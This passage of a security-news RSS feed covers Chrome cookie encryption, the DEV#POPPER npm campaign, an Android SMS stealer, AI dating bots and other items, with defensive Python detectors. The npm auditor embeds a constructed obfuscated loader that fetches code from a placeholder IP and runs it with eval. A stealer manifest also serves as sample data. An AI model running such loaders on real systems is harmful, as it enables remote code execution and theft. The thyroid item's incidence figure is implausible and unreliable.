	He added that the process also requires the stimulation of recombinant human thyroid-stimulating hormone (rhTSH) to enhance sensitivity, which costs around NT$40,000 (US$1,219) each time.
</p>

<p>
	 
</p>

<p>
	"Therefore, finding a simple, effective, and non-invasive tracking method (for the patients' conditions) is what we are currently striving to achieve," Wang said.
</p>

<p>
	 
</p>

<p>
	Dating back to the first batch of 21 patients that joined the study in 2016, the research team found that proteins and peptides in patients' urine, specifically urinary exosomal thyroglobulin (U-Ex Tg) and its associated urinary exosomal peptides panel, can serve as biomarkers that can indicate the recurrence of thyroid cancer.
</p>

<p>
	 
</p>

<p>
	During the research process, the team collected and analyzed urine samples from patients who had been recently diagnosed with papillary or follicular thyroid cancer before and immediately after a total thyroidectomy, as well as three and six months after surgery.
</p>

<p>
	 
</p>

<p>
	"The analysis results show a positive correlation between U-Ex Tg levels and tumor size, and provided pathological insights that the traditional method (of serum thyroglobulin detection) cannot achieve," Wang said, noting the new method also has higher sensitivity and accuracy than the traditional one.
</p>

<p>
	 
</p>

<p>
	To validate the trend changes in the levels of U-Ex Tg, the research team also analyzed galectin-3/TIMP/Angiopoietin-1, another thyroid cancer-related protein in urine.
</p>

<p>
	 
</p>

<p>
	Wang said that this research approach is why the detection method has obtained patents in Taiwan, Japan, and the United States, as it involves not just a single protein, "but is validated through additional methods."
</p>

<p>
	 
</p>

<p>
	Following the International Journal of Nanomedicine publishing his research in May this year, Wang said that his team plans to conduct large-scale clinical trials to further understand the effectiveness of detecting the biomarker U-Ex Tg in patients with different types and stages of thyroid cancer.
</p>

<p>
	 
</p>

<p>
	"We believe that with the accumulation of more clinical data, U-Ex Tg and its associated urinary exosomal peptides panel will become the standard monitoring method for postoperative thyroid cancer in the future," he added.
</p>

<p>
	 
</p>

<p>
	According to the most recent published data from Health Promotion Administration, the incidence rate of thyroid cancer in Taiwan in 2021 was 4,626 cases per 100,000 people.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://focustaiwan.tw/sci-tech/202407310021" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24584</guid><pubDate>Thu, 01 Aug 2024 00:58:36 +0000</pubDate></item><item><title>Google Chrome on Windows will get a new layer of protection for cookies and passwords</title><link>https://nsaneforums.com/news/security-privacy-news/google-chrome-on-windows-will-get-a-new-layer-of-protection-for-cookies-and-passwords-r24575/</link><description><![CDATA[<p>
	Infostealers, a type of malware, are one of the most popular tools used by cybercriminals to steal data from users. These are often distributed through cracked or pirated software, and the stolen data is typically sold on underground forums and markets. This stolen information can be used for extortion or to facilitate further intrusions into systems.
</p>

<p>
	 
</p>

<p>
	In the past, the Google Chrome team has introduced several measures to prevent cookie theft done by infostealer malware, including Chrome’s download protection using Safe Browsing, Device Bound Session Credentials, and Google’s account-based threat detection. Now, the team has announced an additional layer of protection to make Chrome on Windows users safer from cookie-stealing malware.
</p>

<p>
	 
</p>

<p>
	Google Chrome uses Keychain services on macOS, kwallet or gnome-libsecret on Linux and the Data Protection API (DPAPI) on Windows to store sensitive data such as cookies and passwords. While DPAPI on Windows protects this sensitive data at rest from other users on the system or from cold boot attacks, it does not protect against malicious apps capable of executing code as the logged-in user, because DPAPI will decrypt the data for any process running in that user's context. Infostealer malware exploits exactly this gap.
</p>

<p>
	 
</p>

<p>
	Starting with Chrome 127, Google is adding another layer of protection by providing Application-Bound (App-Bound) Encryption primitives. Instead of allowing any app running as the logged-in user to access the sensitive data, Chrome will now encrypt data tied to app identity. Initially, only cookies will be migrated to this improved storage method, with plans to expand it to passwords, payment data, and other persistent authentication tokens in the future.
</p>

<p>
	 
</p>

<p>
	Will Harris, Chrome Security Team, emphasized that App-Bound Encryption increases the difficulty for cybercriminals:
</p>

<p>
	 
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		App-Bound Encryption increases the cost of data theft to attackers and also makes their actions far noisier on the system. It helps defenders draw a clear line in the sand for what is acceptable behavior for other apps on the system.
	</p>
</blockquote>

<p>
	This security improvement marks a significant step towards a more secure browsing experience for millions of Chrome users worldwide.
</p>
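<p>
	The practical consequence of App-Bound Encryption is that the line between "legitimate" and "suspicious" access to Chrome's profile files becomes easy to draw: only Chrome itself should ever open the cookie database or the 'Local State' file that holds the encrypted key. The following Python script is an added example written for this post, not Google's code, that applies that rule to file-access telemetry. The event lines are constructed, and the trusted Chrome install directories and sensitive file names are assumptions to align with your own environment.
</p>

```python
"""Flag processes other than Chrome that read Chrome's encrypted credential stores.

Added example for this post, not Google's code. Under App-Bound Encryption the only
legitimate user-mode reader of the cookie store is Chrome itself, so any other
process opening the Cookies database or the 'Local State' file (which holds the
encrypted key) is a strong infostealer signal. The telemetry below is constructed
in the style of file-access events (time, process image, file touched); trusted
directories and file names are assumptions.
"""
from __future__ import annotations

import csv
import io
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real logs): a cracked-software installer
# reads the key file and the cookie database one after the other.
SAMPLE_EVENTS = r"""time,image,target
2024-07-31T10:00:01Z,C:\Program Files\Google\Chrome\Application\chrome.exe,C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
2024-07-31T10:00:05Z,C:\Users\alice\AppData\Local\Temp\setup_crack.exe,C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State
2024-07-31T10:00:06Z,C:\Users\alice\AppData\Local\Temp\setup_crack.exe,C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
2024-07-31T10:00:09Z,C:\Windows\System32\svchost.exe,C:\Windows\Temp\unrelated.log
2024-07-31T10:01:00Z,C:\Program Files\Google\Chrome\Application\chrome.exe,C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data
"""

# Files under the Chrome profile that hold secrets (or, for 'Local State', the
# encrypted key that unlocks them). Compared case-insensitively.
SENSITIVE_NAMES = {"cookies", "local state", "login data", "web data"}

# Assumed install locations of the only process that should read those files.
TRUSTED_IMAGE_DIRS = (
    PureWindowsPath(r"C:\Program Files\Google\Chrome\Application"),
    PureWindowsPath(r"C:\Program Files (x86)\Google\Chrome\Application"),
)


@dataclass(frozen=True)
class Finding:
    time: str
    image: str
    target: str


def is_chrome_profile_file(target: str) -> bool:
    """True if the path is one of the secret-bearing files inside 'User Data'."""
    path = PureWindowsPath(target)
    parts = {p.lower() for p in path.parts}
    return "user data" in parts and path.name.lower() in SENSITIVE_NAMES


def is_trusted_image(image: str) -> bool:
    """True if the process image lives in Chrome's own install directory."""
    parent = PureWindowsPath(image).parent  # PureWindowsPath compares case-insensitively
    return any(parent == trusted for trusted in TRUSTED_IMAGE_DIRS)


def find_suspicious_readers(csv_text: str) -> list[Finding]:
    """Return every access to a sensitive Chrome file by a non-Chrome process."""
    findings: list[Finding] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if is_chrome_profile_file(row["target"]) and not is_trusted_image(row["image"]):
            findings.append(Finding(row["time"], row["image"], row["target"]))
    return findings


def files_touched_by_image(findings: list[Finding]) -> dict[str, list[str]]:
    """Group findings by process. A process that reads both 'Local State' and a
    data file has collected everything the old DPAPI-only scheme needed for
    decryption as the logged-in user."""
    grouped: dict[str, set[str]] = {}
    for f in findings:
        grouped.setdefault(f.image, set()).add(PureWindowsPath(f.target).name)
    return {image: sorted(names) for image, names in grouped.items()}


if __name__ == "__main__":
    hits = find_suspicious_readers(SAMPLE_EVENTS)
    for image, names in files_touched_by_image(hits).items():
        print(f"ALERT {image} read {', '.join(names)}")
```

<p>
	On the constructed input the installer is flagged for reading both the key file and the cookie database while chrome.exe and svchost.exe are not. App-Bound Encryption raises the bar rather than closing the door: code injected into Chrome or running with system privileges can still reach the key, which is why watching who reads these files remains worthwhile after the change.
</p>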

<p>
	 
</p>

<p>
	Source: <a href="https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html" rel="external nofollow">Google</a>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/google-chrome-on-windows-will-get-a-new-layer-of-protection-for-cookies-and-passwords/" rel="external nofollow">Source</a>
</p>

]]></description><guid isPermaLink="false">24575</guid><pubDate>Wed, 31 Jul 2024 19:41:27 +0000</pubDate></item><item><title>North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS</title><link>https://nsaneforums.com/news/security-privacy-news/north-korea-linked-malware-targets-developers-on-windows-linux-and-macos-r24568/</link><description><![CDATA[<p>
	The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.
</p>

<p>
	 
</p>

<p>
	The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.
</p>

<p>
	 
</p>

<p>
	"This form of attack is an advanced form of social engineering, designed to manipulate individuals into divulging confidential information or performing actions that they might normally not," Securonix researchers Den Iuzvyk and Tim Peck said in a new report shared with The Hacker News.
</p>

<p>
	 
</p>

<p>
	DEV#POPPER is the moniker assigned to an active malware campaign that tricks software developers into downloading booby-trapped software hosted on GitHub under the guise of a job interview. It shares overlaps with a campaign tracked by Palo Alto Networks Unit 42 under the name Contagious Interview.
</p>

<p>
	 
</p>

<p>
	Signs that the campaign was broader and cross-platform in scope emerged earlier this month when researchers uncovered artifacts targeting both Windows and macOS that delivered an updated version of a malware called BeaverTail.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="red.png" class="ipsImage" data-ratio="27.22" height="194" width="720" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieJHZJ0c0cdkzrQh1BzidPGc4lxS2RnIRLAsjXWFevJpHbqDzr_qzr73dwaaYlb76IOQqMCsNNkX4mJMRoJRVDgLUz-UroFjTj97CmSgCKrPJ5wFhKa35EbIk6zgRZeRr5ANdadPnhNH1Fstb47aCCq0CLNHlVlNsuX1tBNxxBaYtEm2u_HMCh8aiIbObZ/s728-rw-e365/red.png" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	The attack chain documented by Securonix is largely consistent with earlier activity: the threat actors pose as interviewers for a developer position and urge candidates to download a ZIP archive for a coding assignment.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	Bundled in the archive is an npm module that, once installed, triggers the execution of an obfuscated JavaScript (i.e., BeaverTail) that determines the operating system on which it's running and establishes contact with a remote server to exfiltrate data of interest.
</p>
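<p>
	The mechanism that makes the "coding assignment" dangerous is npm's lifecycle scripts: <code>preinstall</code>, <code>install</code>, <code>postinstall</code> and <code>prepare</code> run automatically during <code>npm install</code>, before the candidate reads any code. The Python script below is an added example for this post, not Securonix's tooling and not a BeaverTail sample; it audits a package for such hooks and runs simple obfuscation heuristics over the scripts they invoke. The package.json and both JavaScript snippets are constructed, and 192.0.2.10 is a documentation address rather than a real server.
</p>

```python
"""Audit an npm package for install-time hooks and obfuscated scripts before running it.

Added example for this post; it is not Securonix's tooling and the snippets are
not BeaverTail. npm executes the 'preinstall', 'install', 'postinstall' and
'prepare' scripts from package.json on its own during 'npm install', so a
"coding assignment" can run code before the candidate opens a single source
file. The package.json and JavaScript below are constructed.
"""
from __future__ import annotations

import json
import math
import re
from collections import Counter

# Lifecycle scripts npm runs automatically, without 'npm run <name>'.
AUTO_RUN_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")

# Constructed package.json: an innocuous-looking project with a postinstall hook.
PACKAGE_JSON = """{
  "name": "frontend-assignment",
  "version": "1.0.0",
  "scripts": {
    "start": "node server.js",
    "postinstall": "node ./lib/helpers/init.js"
  },
  "dependencies": { "express": "^4.19.2" }
}"""

# Constructed hook script: obfuscator-style names, a base64 URL, a hex-escaped
# module name, a download of the next stage and eval of whatever comes back.
SUSPICIOUS_JS = r"""
var _0x4f2a=['aHR0cDovLzE5Mi4wLjIuMTA6MTI0NC9jbGllbnQvMTIv','\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73'];
const os=require('os'),https=require('https'),cp=require(_0x4f2a[1]);
(function(){const url=Buffer.from(_0x4f2a[0],'base64').toString();
https.get(url+os.platform(),r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d));});})();
"""

# Constructed benign script for comparison.
BENIGN_JS = """const express = require('express');
const app = express();
app.get('/', (req, res) => res.send('ok'));
app.listen(3000);
"""


def install_hooks(package_json_text: str) -> dict[str, str]:
    """Return the lifecycle scripts that would run unattended on 'npm install'."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in AUTO_RUN_SCRIPTS}


def shannon_entropy(text: str) -> float:
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def decode_hex_escapes(js: str) -> str:
    """Turn '\\x63\\x68...' literals back into plain text so keyword checks see them."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js)


def audit_script(js: str) -> list[str]:
    """Heuristic indicators of a loader/stealer stage; order of hits is not significant."""
    hits: list[str] = []
    plain = decode_hex_escapes(js)
    if re.search(r"\beval\s*\(", plain):
        hits.append("eval")
    if re.search(r"new\s+Function\s*\(", plain):
        hits.append("new Function")
    if "child_process" in plain:
        hits.append("child_process")
    if re.search(r"Buffer\.from\([^)]*['\"]base64['\"]", plain):
        hits.append("base64 decode")
    if re.search(r"_0x[0-9a-f]{3,}", js):
        hits.append("obfuscator-style identifiers")
    if len(re.findall(r"\\x[0-9a-fA-F]{2}", js)) >= 8:
        hits.append("hex-escaped strings")
    for literal in re.findall(r"['\"]([A-Za-z0-9+/=]{24,})['\"]", js):
        if shannon_entropy(literal) > 4.0:  # base64/packed payloads sit well above prose
            hits.append("high-entropy literal")
            break
    return hits


def audit(package_json_text: str, scripts: dict[str, str]) -> dict:
    """Combine hook discovery with per-file heuristics into one verdict."""
    hooks = install_hooks(package_json_text)
    findings = {path: audit_script(src) for path, src in scripts.items()}
    findings = {path: hits for path, hits in findings.items() if hits}
    if hooks and findings:
        verdict = "do not install"
    elif hooks or findings:
        verdict = "review before install"
    else:
        verdict = "no automatic execution found"
    return {"install_hooks": hooks, "script_findings": findings, "verdict": verdict}


if __name__ == "__main__":
    print(json.dumps(audit(PACKAGE_JSON, {"lib/helpers/init.js": SUSPICIOUS_JS,
                                          "server.js": BENIGN_JS}), indent=2))
```

<p>
	The cheapest control is still <code>npm install --ignore-scripts</code> (or <code>ignore-scripts=true</code> in <code>.npmrc</code>) inside a disposable VM, which prevents the hook from running at all; the audit above is for deciding whether the archive deserves a closer look before that point.
</p>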

<p>
	 
</p>

<p>
	It's also capable of downloading next-stage payloads, including a Python backdoor referred to as InvisibleFerret, which is designed to gather detailed system metadata, access cookies stored in web browsers, execute commands, upload/download files, as well as log keystrokes and clipboard content.
</p>

<p>
	 
</p>

<p>
	New features added to the recent samples include the use of enhanced obfuscation, AnyDesk remote monitoring and management (RMM) software for persistence, and improvements to the FTP mechanism employed for data exfiltration.
</p>

<p>
	 
</p>

<p>
	Furthermore, the Python script acts as a conduit to run an ancillary script that's responsible for stealing sensitive information from various web browsers – Google Chrome, Opera, and Brave – across different operating systems.
</p>

<p>
	 
</p>

<p>
	"This sophisticated extension to the original DEV#POPPER campaign continues to leverage Python scripts to execute a multi-stage attack focused on exfiltrating sensitive information from victims, though now with much more robust capabilities," the researchers said.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2024/07/north-korea-linked-malware-targets.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24568</guid><pubDate>Wed, 31 Jul 2024 16:34:01 +0000</pubDate></item><item><title>Massive SMS stealer campaign infects Android devices in 113 countries</title><link>https://nsaneforums.com/news/security-privacy-news/massive-sms-stealer-campaign-infects-android-devices-in-113-countries-r24556/</link><description><![CDATA[<p>
	A malicious campaign targeting Android devices worldwide utilizes thousands of Telegram bots to infect devices with SMS-stealing malware and steal one-time 2FA passwords (OTPs) for over 600 services.
</p>

<p>
	 
</p>

<p>
	Zimperium researchers <a href="https://www.zimperium.com/blog/unmasking-the-sms-stealer-targeting-several-countries-with-deceptive-apps/" rel="external nofollow" target="_blank">discovered the operation</a> and have been tracking it since February 2022. They report finding at least 107,000 distinct malware samples associated with the campaign.
</p>

<p>
	 
</p>

<p>
	The cybercriminals are motivated by financial gain, most likely using infected devices as authentication and anonymization relays.
</p>

<h2>
	Telegram entrapment
</h2>

<p>
	The SMS stealer is distributed either through malvertising or Telegram bots that automate communications with the victim.
</p>

<p>
	 
</p>

<p>
	In the first case, victims are led to pages mimicking Google Play, reporting inflated download counts to add legitimacy and create a false sense of trust.
</p>

<p>
	 
</p>

<p>
	On Telegram, the bots promise to give the user a pirated application for the Android platform, asking for their phone number before they share the APK file.
</p>

<p>
	 
</p>

<p>
	The Telegram bot uses that number to generate a new APK, making personalized tracking or future attacks possible.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Telegram bot delivering the SMS stealer" class="ipsImage" height="516" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2024/Android/16/telegram.jpg">
		<figcaption>
			<strong>Telegram bot delivering the SMS stealer to a victim</strong><br>
			<em>Source: Zimperium</em>
		</figcaption>
	</figure>
</div>

<p>
	Zimperium says the operation uses 2,600 Telegram bots to promote various Android APKs, which are controlled by 13 command and control (C2) servers.
</p>

<p>
	 
</p>

<p>
	Most of the victims of this campaign are located in India and Russia, while Brazil, Mexico, and the United States also have significant victim counts.
</p>

<h2>
	Generating money
</h2>

<p>
	Zimperium found that the malware transmits the captured SMS messages to a specific API endpoint at the website 'fastsms.su.'
</p>

<p>
	 
</p>

<p>
	The site allows visitors to purchase access to "virtual" phone numbers in foreign countries, which they can use for anonymization and to authenticate to online platforms and services.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Fast SMS website" class="ipsImage" height="408" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2024/Android/16/fastsms.jpg">
		<figcaption>
			<strong>Fast SMS website</strong><br>
			<em>Source: BleepingComputer</em>
		</figcaption>
	</figure>
</div>

<p>
	It is very likely that the infected devices are actively used by that service without the victims knowing it.
</p>

<p>
	 
</p>

<p>
	The requested Android SMS access permissions allow the malware to capture the OTPs required for account registrations and two-factor authentication.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="The stealer malware exfiltrating SMS to the site's API" class="ipsImage" height="600" style="height: auto;" width="783" src="https://www.bleepstatic.com/images/news/u/1220909/2024/Android/16/sms-exfiltration.jpg">
		<figcaption>
			<strong>The malware exfiltrating SMS to the Fast SMS site</strong><br>
			<em>Source: Zimperium</em>
		</figcaption>
	</figure>
</div>

<p>
	BleepingComputer has contacted the Fast SMS service to ask about Zimperium's findings, but a response wasn't available by publication.
</p>

<p>
	 
</p>

<p>
	For the victims, this can incur unauthorized charges on their mobile account, while they may also be implicated in illegal activities traced back to their device and number.
</p>

<p>
	 
</p>

<p>
	To avoid phone number abuse, avoid downloading APK files from outside Google Play, do not grant risky permissions to apps with unrelated functionality, and ensure Play Protect is active on your device.
</p>
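<p>
	"Risky permissions for unrelated functionality" can be checked mechanically before an APK is installed. The Python script below is an added example for this post, not Zimperium's detection logic. It reads a decoded AndroidManifest.xml (assumption: the binary manifest has already been converted to text by a tool such as apktool) and asks two questions: does the app request permissions its stated purpose does not need, and does it declare the combination that enables OTP harvesting, namely SMS permissions, a receiver for the SMS_RECEIVED broadcast and INTERNET to send the messages onward. Both manifests and the "what a media player needs" baseline are constructed.
</p>

```python
"""Check a decoded AndroidManifest.xml for SMS-interception capability.

Added example for this post, not Zimperium's detection logic. Input is a manifest
already decoded to text (assumption: apktool or similar has run). The two
manifests and the expected-permission baseline below are constructed.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"
SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_MMS",
    "android.permission.RECEIVE_WAP_PUSH",
}
INTERNET = "android.permission.INTERNET"

# Constructed: a 'video player' that wants SMS and a high-priority SMS receiver.
STEALER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.freeplayer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <application android:label="Free Video Player">
    <activity android:name=".MainActivity"/>
    <receiver android:name=".SmsReceiver" android:exported="true">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed: the same kind of app asking only for what a player needs.
PLAYER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.player">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Video Player">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>"""

# What a media player legitimately needs (assumed baseline).
PLAYER_EXPECTED = {INTERNET}


def android_attr(elem: ET.Element, name: str) -> str | None:
    """Read an attribute from the android: namespace."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def declared_permissions(root: ET.Element) -> set[str]:
    return {android_attr(e, "name") or "" for e in root.iter("uses-permission")}


def sms_receivers(root: ET.Element) -> list[dict]:
    """Receivers registered for SMS_RECEIVED, with their filter priority
    (a high priority lets the app see the message before the default SMS app)."""
    found = []
    for receiver in root.iter("receiver"):
        for flt in receiver.findall("intent-filter"):
            actions = {android_attr(a, "name") for a in flt.findall("action")}
            if SMS_RECEIVED_ACTION in actions:
                priority = android_attr(flt, "priority")
                found.append({
                    "receiver": android_attr(receiver, "name"),
                    "priority": int(priority) if priority else 0,
                    "exported": android_attr(receiver, "exported") == "true",
                })
    return found


def assess(manifest_xml: str, expected_permissions: set[str]) -> dict:
    root = ET.fromstring(manifest_xml)
    perms = declared_permissions(root)
    receivers = sms_receivers(root)
    # Capability check: can receive SMS in-app and ship the contents somewhere.
    can_intercept = (bool(perms & {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"})
                     and INTERNET in perms and bool(receivers))
    unexpected = sorted(perms - expected_permissions)
    if can_intercept:
        verdict = "likely SMS stealer"
    elif unexpected:
        verdict = "review permissions"
    else:
        verdict = "consistent with stated purpose"
    return {
        "package": root.get("package"),
        "unexpected_permissions": unexpected,
        "sms_receivers": receivers,
        "otp_interception_capable": can_intercept,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for manifest in (STEALER_MANIFEST, PLAYER_MANIFEST):
        result = assess(manifest, PLAYER_EXPECTED)
        print(result["package"], "->", result["verdict"], result["unexpected_permissions"])
```

<p>
	The check is deliberately conservative: a genuine messaging app will trip the capability test too, which is why the verdict is paired with an expected-permission baseline for the category the app claims to belong to.
</p>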

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/massive-sms-stealer-campaign-infects-android-devices-in-113-countries/" rel="external nofollow">Source</a>
</p>

]]></description><guid isPermaLink="false">24556</guid><pubDate>Wed, 31 Jul 2024 03:15:49 +0000</pubDate></item><item><title>AI dating bots fool over 14,000 guys who fall hard</title><link>https://nsaneforums.com/news/security-privacy-news/ai-dating-bots-fool-over-14000-guys-who-fall-hard-r24554/</link><description><![CDATA[<p>
	A French YouTuber has made an AI bot to see if girls truly get more likes on dating apps, and the results are both funny and disturbing at the same time. Now we need to be careful of AI in addition to fake accounts.
</p>

<p>
	 
</p>

<p>
	Inspired by <a href="https://youtu.be/CqhcntD1JN4" rel="external nofollow" target="_blank">Micode’s video</a> on the best catchphrases on dating apps, YouTuber <a href="https://www.youtube.com/@DefendIntelligence" rel="external nofollow" target="_blank">Defend Intelligence</a> made multiple chatbots to see if AI can fool humans. Spoiler alert: we are not ready for sexy Skynet. We may think we are too good to fall for such a scheme, and I bet that’s exactly what many of those who got caught in the net said.
</p>

<p>
	 
</p>

<p>
	Defend Intelligence made five bots with different personalities, four pretending to be females plus one posing as a male. Interestingly, while the YouTuber coded the bot to not give users hope by accepting real-life meetings, the AI sometimes crossed the line and accepted.
</p>

<p>
	 
</p>

<p>
	Thankfully the second rule, ordering the AI to stop talking with each user after 40 messages, did work as intended, preventing romantic attachments from forming. Some users didn’t accept this and continued to text the bot long after it ghosted them. For example, one person sent over a hundred messages after the AI stopped talking, showing just how easy it is to get hooked.
</p>

<p>
	 
</p>

<p>
	But this isn’t the worst part: some started sharing personal feelings and desires, thinking they were talking to a human. Those are things that can be used against them if the person behind the bot has bad intentions. This shows how AI can be used to make someone emotionally dependent, which opens the door to predatory behaviours such as scams. So, after seeing this, you may want to be more careful.
</p>

<p>
	 
</p>

<div class="ipsEmbeddedVideo" contenteditable="false">
	<div>
		<iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" frameborder="0" height="113" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube-nocookie.com/embed/4lkWl6NL2wg?feature=oembed" title="J'ai codé une IA qui a soumis 14 252 mecs, voici ce que j'ai appris." width="200"></iframe>
	</div>
</div>

<p>
	 
</p>

<p>
	As you can guess, these apps are extremely sensitive and aggressive whenever they suspect an account of being a bot. Thus, to stay under their radar as much as possible, Defend Intelligence used real smartphones controlled via ADB (Android Debug Bridge) instead of emulators, plus pictures as close to reality as possible, one of which is based on a friend of his.
</p>

<p>
	 
</p>

<p>
	Some users went as far as to reverse image search the pictures, managing to find her true Instagram account and messaging her there. This prompted the YouTuber to take things a step further by creating websites for his bots to make them look more like real individuals with lives of their own.
</p>

<p>
	 
</p>

<p>
	After some time had passed on this experiment, a funny yet eye-opening thing happened. Two of the AI bots matched together and started talking, each acting as if it was human.
</p>

<p>
	 
</p>

<p>
	While it may be funny to see two AIs hitting on each other, it gives us a glimpse at a potential future. One where everyone has an AI reflecting their personality, used to filter the massive number of potential partners before giving a curated list of high-potential matches. These could be people sharing the same interests or having traits you appreciate. For example, someone who likes jokes, or someone that doesn’t need to be texted every hour.
</p>

<p>
	 
</p>

<p>
	To drive home the likelihood of this occurring, the number of online dating service users worldwide surpassed 381 million in 2023, according to <a href="https://www.statista.com/topics/7443/online-dating/" rel="external nofollow" target="_blank">Statista</a>. This is a possibility that Whitney Wolfe Herd – Founder of dating app Bumble – <a href="https://youtu.be/zYzuycrGqkI" rel="external nofollow" target="_blank">talked about</a>. After all, AI and algorithms already choose our future to some extent as they are responsible for which person’s profile we will see next. Fantastic or dystopian, I’ll let you be the judge.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.club386.com/ai-dating-bots-fool-over-14000-guys-who-fall-hard/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">24554</guid><pubDate>Tue, 30 Jul 2024 20:37:41 +0000</pubDate></item><item><title>Multiple Microsoft 365 services are facing another outage</title><link>https://nsaneforums.com/news/security-privacy-news/multiple-microsoft-365-services-are-facing-another-outage-r24542/</link><description><![CDATA[<p>
	Users around the world have been reporting issues accessing Microsoft 365 services and features for the past few hours. Microsoft has confirmed that certain users are experiencing access issues and degraded performance with multiple Microsoft 365 services and features, and they are investigating the situation.
</p>

<p>
	 
</p>

<p style="margin-left:40px;">
	<em>We're currently investigating access issues and degraded performance with multiple Microsoft 365 services and features. More information can be found under MO842351 in the admin center.</em>
</p>

<p style="margin-left:40px;">
	<br />
	<em>— Microsoft 365 Status (@MSFT365Status) <span style="color:#2980b9;">July 30, 2024</span></em>
</p>

<p>
	 
</p>

<p>
	Impacted services include, but are not limited to:
</p>

<p>
	 
</p>

<ul>
	<li>
		    Microsoft Entra
	</li>
	<li>
		    Microsoft Power Platform
	</li>
	<li>
		    Microsoft Intune
	</li>
	<li>
		    Microsoft 365 Admin Center
	</li>
</ul>

<p>
	 
</p>

<p>
	The following services are not impacted:
</p>

<p>
	 
</p>

<ul>
	<li>
		    SharePoint Online
	</li>
	<li>
		    OneDrive for Business
	</li>
	<li>
		    Microsoft Teams
	</li>
	<li>
		    Exchange Online
	</li>
</ul>

<p>
	 
</p>

<p>
	To mitigate the network issue, Microsoft has implemented networking configuration changes and performed failovers to alternate networking paths. According to Microsoft's telemetry, these networking changes have shown improvement in service availability since approximately 14:10 UTC. Microsoft is continuing to monitor the situation to ensure the full recovery of all Microsoft 365 services.
</p>

<p>
	 
</p>

<p>
	Given that Microsoft 365 services experienced a <span style="color:#2980b9;">similar outage earlier this month</span>, it's clear that Microsoft needs to prioritize enhancing the reliability of its cloud infrastructure. Repeated disruptions to essential services not only inconvenience users but also raise concerns about the platform's stability. As we await further updates from Microsoft, we hope they will take significant steps to prevent such issues from recurring in the future.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.neowin.net/news/multiple-microsoft-365-services-are-facing-another-outage/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">24542</guid><pubDate>Tue, 30 Jul 2024 18:25:48 +0000</pubDate></item><item><title>Microsoft: Ransomware gangs exploiting VMware ESXi flaw</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-ransomware-gangs-exploiting-vmware-esxi-flaw-r24540/</link><description><![CDATA[<p>
	<span style="font-size:18px;"><strong>VMware ESXi has proven to be a popular target for ransomware threat actors and a challenge for enterprises to patch. </strong></span>
</p>

<p>
	 
</p>

<p>
	Microsoft warned that multiple ransomware gangs including Black Basta are exploiting a VMware ESXi vulnerability that could allow attackers to gain full administrative permissions on an affected machine.
</p>

<p>
	 
</p>

<p>
